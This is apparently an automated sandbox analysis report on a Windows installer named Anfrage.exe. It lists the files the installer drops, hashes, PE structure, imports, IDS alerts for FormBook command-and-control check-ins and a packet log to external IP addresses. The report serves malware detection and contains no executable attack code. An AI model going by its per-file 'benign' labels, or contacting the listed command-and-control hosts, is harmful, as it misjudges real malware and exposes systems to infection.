                                                                        SHA-512:9D8B1BDDD0285B06FA22A91ED0C228946C377D3175E3B8A76B48ED1FF7B6B2219209637065ED5AC7A70C2BBA0FC6466DC55E0B4794364D904DFD5A40773E1505
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:..K...............................*.....ss..................O........``......:..b...''.....XXX..........................................55.C.......................ooo...........K..............4.........<..........====.............S.{..w..............nnnn....9.......nnn.........TT.............a...............S.n.F......:.......^^.Y.kk.....33.bb...VV...............CC....................i............c....................Z...............@@..............................66.o..............e..............f.,....]]].^.....P..............kkk...........PP........................H.......z..............yyy..............((......pppp.......,,,,,.....11.................qq......}.AAA................y................e.........Q.............H.............Q.LLL........77...,,,.........///......cccc.....+.7...................DD.......*......................YY.......%.Y......++.........J...-........EE..............................q.........jjjj...ppp.//////..n.......RRR........z.............................

                                                                        C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic\Tingid.pig

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):476422
                                                                        Entropy (8bit):1.2552031449987011
                                                                        Encrypted:false
                                                                        SSDEEP:1536:zGmPxn4XjZOVebnJjvYbTUBhGKcjnO/EeMHPm:Sm6zYVb849nH6
                                                                        MD5:F236A74F28F6F32F81F1347D9F129268
                                                                        SHA1:D5BE521661EE4BF3C186C3EAA0411DD5DF6F3EBA
                                                                        SHA-256:BEED12F00B12156FF9FA63595DE11A5C01493CF5F85488CB2E159CF1A8236778
                                                                        SHA-512:D6AD37DDF7B6B38B90F09186AC81C6A76F16F9A4613D6113F10D7B2A4F68129E570EFFC77A19B04F276277B7A569EBD5FD4A48D2E2E72CEA8CEE5A8F67CC5EF4
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:.................................................................7...........................).....$....%..........................#.....M.....................................6.........N.........).......................................................................................a..............t..................................................T.........................................@...........................+..U...................A'..............L..................................................../.............2..............k.........................................................................................................&.............................................>...........................................................|..........................?...............................&...................................n.q......}....................................E......................................................p........................................6..........

                                                                        C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic\anya.por

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):448073
                                                                        Entropy (8bit):1.2554221597008608
                                                                        Encrypted:false
                                                                        SSDEEP:1536:i9EUBeeNEu//hQg77ea6OP/B1p7to4APRUYZAkxe:qFZO5u/B1pBo510
                                                                        MD5:3AD8D5763CA124C7392D1F4F53D24F0E
                                                                        SHA1:17D48EF1AB8D52A31821A069C225D45201535899
                                                                        SHA-256:3965D74DBD296AA8E7524C773FE81FE63A78355145502153CB577E9CB136DDA0
                                                                        SHA-512:EE8BDE196A33297BFD4E51ED01E7D0178CF457497E822771D2BE3C58A97681AC52CD19A2BBBB71220F06F6D936A6AA67966295DF3C676104B9643F07CBE37EC8
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:............y...k......... ....L..............................................................c....................d...........................p..............R.................................................5...............f.......{......................................................................................J...........@.................E....h...............0................M.................'..............................................-...............Z.........................{...............T............c.W..............n....................H...........................................|...................................^...........w.................c...............................).....................................y.....<.......................................T........................................................3.....S..<.......?........................................1!......^.............................t................................................G........

                                                                        C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic\besiddertrang.gra

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):362911
                                                                        Entropy (8bit):1.2562704713226092
                                                                        Encrypted:false
                                                                        SSDEEP:768:uFKWW9YiDlIMhmjVacve6tEvHBLNB3tQsrTpPH8mZLAUFwsahGF48hDpWRcKthwz:u5W9yMJLNbJ1CbFV3Gd6Ie48dPs
                                                                        MD5:8AB9852274FA64E09B5711A2E7D94AAB
                                                                        SHA1:2C39272B969040B4C185EE4A69A5F04FD1F7C0DB
                                                                        SHA-256:FCD149788A3530E5E2CF5E17A09B1DE51EB67B51F3E8941E7091F88B610373F1
                                                                        SHA-512:6761208A22E8D93D70465E6DD9CF1B53826AA6BF0418DCCB0A6E5816A183790A61AD67EDCF52D21366975014701107563CE47A0465CEE801300493AEB566CC69
                                                                        Malicious:false
                                                                        Preview:....-......................................................................?d..........\.a.....................................8...............x...........e...................................)...............+..............................................i...................................................................................................................4......j................................................................................"......................................Z.....%...................................................................................................F............................................................................g...............................E./.....................................................................................Y........#.......F.......n.M.........................................................................................................................W..................................................

                                                                        C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic\darbyite.txt

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):497
                                                                        Entropy (8bit):4.296439217688297
                                                                        Encrypted:false
                                                                        SSDEEP:12:kdESMQrs7ZnIyxrqlLIRF0+UAkN0lCGsMqejQlJ8:QjMfpIuqPAEsOi
                                                                        MD5:1560371431CEB91914AF5B9D0D307EE1
                                                                        SHA1:182B8979D4D0F9F26366653638A9C92FDAFF0D56
                                                                        SHA-256:72A2010CDB6ED407FCA17CDB181D5F01801F16040C2C9443BD7CB5032CDAAEF7
                                                                        SHA-512:865EF0F7636149A47043183583635C2A4306BF49565166760672B88F0F9DA89A529FE4166DFF496327304E56A8A460B8113E5F3D58601C0B8A3EFAABD792AF3D
                                                                        Malicious:false
                                                                        Preview:avenging piktogrammernes duecento korsedderkop skurvognsudlejningernes fnges ranaria..kavitet ubetalelige forhalingen passado nautically formaalsbestemmelsernes admiralsuniformers..franchot unimposing rimfire.bemba barsac unflaked skbnesvanger.tige backchats leveret viktualieforretningernes processal dignitas altica epoxyharpikset sergenter forureningsbegrnsedes..sforsvaret antiquating photomechanically enighedernes firepot megrez almon aeneus madrassen thrallborn denoteres slipup tvebakken..

                                                                        C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic\nilgedde.mes

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:Matlab v4 mat-file (little endian) Y, numeric, rows 0, columns 0
                                                                        Category:dropped
                                                                        Size (bytes):354845
                                                                        Entropy (8bit):1.2446363869824946
                                                                        Encrypted:false
                                                                        SSDEEP:768:E2oz5FNvncy2DZRau7W0sxOvPfSfpg5rWuWAAUIdde/FwPPMk/FOuyQv9biuPia6:opho02mYrKiKLFyJ1AIu2
                                                                        MD5:DF7A44909B03AB5BC45910B405D9977A
                                                                        SHA1:3D0583A7DFB39E559827189E02123F2C983A21D5
                                                                        SHA-256:5A3B61A0BC8E81E756374D2A9FF5087FA4496543A635738ACA8911E95D6340D9
                                                                        SHA-512:C2B4E951A185FC3FB75109B5CAA554431C1517588D04B8F2BA865F75BE448A0448364BCB84253C9B44579078787DDA616F33666C0C1BF902EC644EBC9A6FE621
                                                                        Malicious:false
                                                                        Preview:..................%.Y.............................[......................z...........................................8.................{................b.......W..........................................#.........................................%....z..................7......................................x.i...+............................................................................8......................................................................................................................-..3..................................................................................|............T...........................#...........\.....A.............................................7..........'.................... ...................].................J.J..........s................................g..............W........................................................................................................$...g..........................................................

                                                                        C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic\selefant.kri

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):298017
                                                                        Entropy (8bit):1.245520550165085
                                                                        Encrypted:false
                                                                        SSDEEP:768:nLoDoRi0SWvTrmnVqvh6dzfCaci65UhXqjMctTGA3QBgdRWqrw3q3LFPRvx7H155:DStBsLk6gsifeQIGA0iYRwvy8n
                                                                        MD5:B4C9FC75BAB8C9F006A7D9DDBC249F79
                                                                        SHA1:70D4047E7E3BB10CF237B82775C89A1D92700162
                                                                        SHA-256:1D84F9462C244A4500C213DF8DD79971B286392CA02BC536F5F6C3EEBC94E7E3
                                                                        SHA-512:2E2279CB3755AC5708ABB30E8342235B7F0A24223E3D6F4B2B21B62E59012A5126ADC1BD73D7B64E72634728DECCE7A049D3E6F5055F8D74E959BEE54EDBEA4C
                                                                        Malicious:false
                                                                        Preview:............................_..,...........................................................;...........................................................7...O..................'.........................................P.........L................@....................8....................v..................G.....h.............................................m..+b.....................................................m.......C.....................................i..........................................................................................,................................C..........a...........Y......,...........q....................................................................................................................................................................................................................p................S................L..........)..............................................kF........^........E.................................................

                                                                        C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic\speil.int

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):497497
                                                                        Entropy (8bit):1.2525295412969446
                                                                        Encrypted:false
                                                                        SSDEEP:1536:rbNZ/Rg8JCCgxT2eIgde/lBWTTBwGceukAdTYz91n6n:9NRg836IVLWHeGxKYQ
                                                                        MD5:F3F6C6E37EAB51D3B9B9C059C1EB874C
                                                                        SHA1:401E5740CCFBC1DA83BD9B426C11020C812986F2
                                                                        SHA-256:B5A607F50C65E41B2BFF7F852F27373177D326D9DFA1040E1C2B3AF62F757BAB
                                                                        SHA-512:060B328595ADAF9E85B390AA2AACEEFE4C6197294B7C45594798755C5E04BE1E2110F617B51E38D7DF423CD807FA81B30702CE2548563980B9CA195ECF2C11A7
                                                                        Malicious:false
                                                                        Preview:.........................................o................j........................................c..6......................................../....................................................m...............................r.D................................T.........................................................8....................x...................................................................!.....O....\................G.........................................G........n....."................:.........................................................................................................@.......<..................................................i.......k..............................................................................................................................=.........g.........................k.............A.......[........................)...........e................................b.............................................6.............

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Entropy (8bit):7.583566729182234
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:Anfrage.exe
                                                                        File size:1'251'520 bytes
                                                                        MD5:71ea800a6b7644be75507e3b74e3cce2
                                                                        SHA1:aa1ac653b8d942a98770538d3e1fb325491cab45
                                                                        SHA256:e81a266ca8fee88c3eee94cea7494225e905354c9e31635683467fbfe7844d91
                                                                        SHA512:343e413312eabe6dd29e6e4d567eb70ec49d8d7e1d004a71e000896046dd33dc81928cbfebb68bd763eba2bcca3bf729abf05473361728a328aaf66c5a430eed
                                                                        SSDEEP:24576:5CAoDyk/vnt3h1CzLuTIvjb053uAY/lxSlge7w6/tBYPeuHdB4bU4VD4T:5CAfqvtx1UuTI7b82llQfIWuHHSU4VDq
                                                                        TLSH:3A45124277760EA5E85984F79266CD347F63BC7B014006EB325CFB1A4AB63F0452B63A
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...<.MX.................b...|.....

                                                                        File Icon

                                                                        Icon Hash:076d76bb4c713307

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4031a3
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x584DCA3C [Sun Dec 11 21:50:52 2016 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de

                                                                        Authenticode Signature

                                                                        Signature Valid:false
                                                                        Signature Issuer:CN=Testaceous, O=Testaceous, L=Barrasford, C=GB
                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                        Error Number:-2146762487
                                                                        Not Before, Not After
                                                                        • 06/04/2024 11:43:32 06/04/2027 11:43:32
                                                                        Subject Chain
                                                                        • CN=Testaceous, O=Testaceous, L=Barrasford, C=GB
                                                                        Version:3
                                                                        Thumbprint MD5:A88F8D93DF4B32C3100DB6EF0B28E632
                                                                        Thumbprint SHA-1:01B3F6D5BCACC2E65D0EA80030911353974B0020
                                                                        Thumbprint SHA-256:3E09325D6D6531EC211596912CFD7F18EDCF1743A1245B99446C72726BBE3F3D
                                                                        Serial:04B33E16D2845ED588789A6EB5537D3B893D640E

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        sub esp, 00000184h
                                                                        push ebx
                                                                        push esi
                                                                        push edi
                                                                        xor ebx, ebx
                                                                        push 00008001h
                                                                        mov dword ptr [esp+18h], ebx
                                                                        mov dword ptr [esp+10h], 0040A198h
                                                                        mov dword ptr [esp+20h], ebx
                                                                        mov byte ptr [esp+14h], 00000020h
                                                                        call dword ptr [004080A8h]
                                                                        call dword ptr [004080A4h]
                                                                        cmp ax, 00000006h
                                                                        je 00007F03D47E7C03h
                                                                        push ebx
                                                                        call 00007F03D47EAB71h
                                                                        cmp eax, ebx
                                                                        je 00007F03D47E7BF9h
                                                                        push 00000C00h
                                                                        call eax
                                                                        mov esi, 00408298h
                                                                        push esi
                                                                        call 00007F03D47EAAEDh
                                                                        push esi
                                                                        call dword ptr [004080A0h]
                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                        cmp byte ptr [esi], bl
                                                                        jne 00007F03D47E7BDDh
                                                                        push ebp
                                                                        push 00000009h
                                                                        call 00007F03D47EAB44h
                                                                        push 00000007h
                                                                        call 00007F03D47EAB3Dh
                                                                        mov dword ptr [0042F404h], eax
                                                                        call dword ptr [00408044h]
                                                                        push ebx
                                                                        call dword ptr [00408288h]
                                                                        mov dword ptr [0042F4B8h], eax
                                                                        push ebx
                                                                        lea eax, dword ptr [esp+38h]
                                                                        push 00000160h
                                                                        push eax
                                                                        push ebx
                                                                        push 00429828h
                                                                        call dword ptr [00408174h]
                                                                        push 0040A188h
                                                                        push 0042EC00h
                                                                        call 00007F03D47EA767h
                                                                        call dword ptr [0040809Ch]
                                                                        mov ebp, 00435000h
                                                                        push eax
                                                                        push ebp
                                                                        call 00007F03D47EA755h
                                                                        push ebx
                                                                        call dword ptr [00408154h]

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85340xa0.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4b0000x64f00.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x12f5f00x22d0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x60710x620086ec2a2da0012903b23e33f511180572False0.6687659438775511data6.434342820031866IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x80000x13520x1400cd090b7c5bd9ae3da2a43d4f02ef98b7False0.4599609375data5.237297010093776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0xa0000x254f80x600e98382d1559cdefaafaf45200fe1faf0False0.4544270833333333data4.037252180314336IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .ndata0x300000x1b0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0x4b0000x64f000x650004b35ddad0638afdc14d8651f31f9f72eFalse0.5893022896039604data6.144636705094013IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_BITMAP0x4b4000x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                        RT_ICON0x4b7680x4180cDevice independent bitmap graphic, 255 x 510 x 32, image size 260100EnglishUnited States0.5566530003727171
                                                                        RT_ICON0x8cf780x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.6340796167041287
                                                                        RT_ICON0x9d7a00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.6664652091654404
                                                                        RT_ICON0xa6c480x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.6956188001889466
                                                                        RT_ICON0xaae700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.6902489626556016
                                                                        RT_ICON0xad4180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.724437148217636
                                                                        RT_ICON0xae4c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.7479508196721312
                                                                        RT_ICON0xaee480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.799645390070922
                                                                        RT_DIALOG0xaf2b00x144dataEnglishUnited States0.5216049382716049
                                                                        RT_DIALOG0xaf3f80x13cdataEnglishUnited States0.5506329113924051
                                                                        RT_DIALOG0xaf5380x100dataEnglishUnited States0.5234375
                                                                        RT_DIALOG0xaf6380x11cdataEnglishUnited States0.6091549295774648
                                                                        RT_DIALOG0xaf7580xc4dataEnglishUnited States0.5918367346938775
                                                                        RT_DIALOG0xaf8200x60dataEnglishUnited States0.7291666666666666
                                                                        RT_GROUP_ICON0xaf8800x76dataEnglishUnited States0.7457627118644068
                                                                        RT_VERSION0xaf8f80x2c8dataEnglishUnited States0.5084269662921348
                                                                        RT_MANIFEST0xafbc00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                        Imports

                                                                        DLLImport
                                                                        KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                        USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                        ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-11-11T12:03:35.896385+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.849705TCP
                                                                        2024-11-11T12:04:13.973164+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.849711TCP
                                                                        2024-11-11T12:04:37.711666+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.849713188.40.95.144443TCP
                                                                        2024-11-11T12:05:16.864867+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.8497163.33.130.19080TCP
                                                                        2024-11-11T12:05:16.864867+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.8497163.33.130.19080TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 11, 2024 12:04:36.860066891 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:36.860126972 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:36.860383987 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:36.874871969 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:36.874897957 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.467662096 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.467829943 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.532603025 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.532633066 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.532936096 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.532994032 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.537040949 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.579345942 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.711769104 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.711827993 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.711848021 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.711878061 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.711889982 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.711925030 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.711931944 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.712029934 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.717025042 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.717106104 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.795533895 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.795675039 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.795996904 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.796075106 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.800761938 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.800890923 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.801462889 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.801573038 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.879268885 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.879417896 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.879709959 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.879851103 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.879961967 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.880048037 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.880669117 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.880755901 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.881536007 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.881628036 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.884691000 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.884802103 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.885119915 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.885206938 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.885915995 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.886023998 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.925332069 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.925430059 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.964565992 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.964685917 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.964701891 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.964731932 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.964787006 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.964813948 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.964838028 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.964919090 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.964946985 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.965019941 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.965056896 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.965123892 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.965153933 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.965224981 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.969737053 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.969830036 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.969856024 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.969934940 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.970431089 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.970504999 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.970524073 CET44349713188.40.95.144192.168.2.8
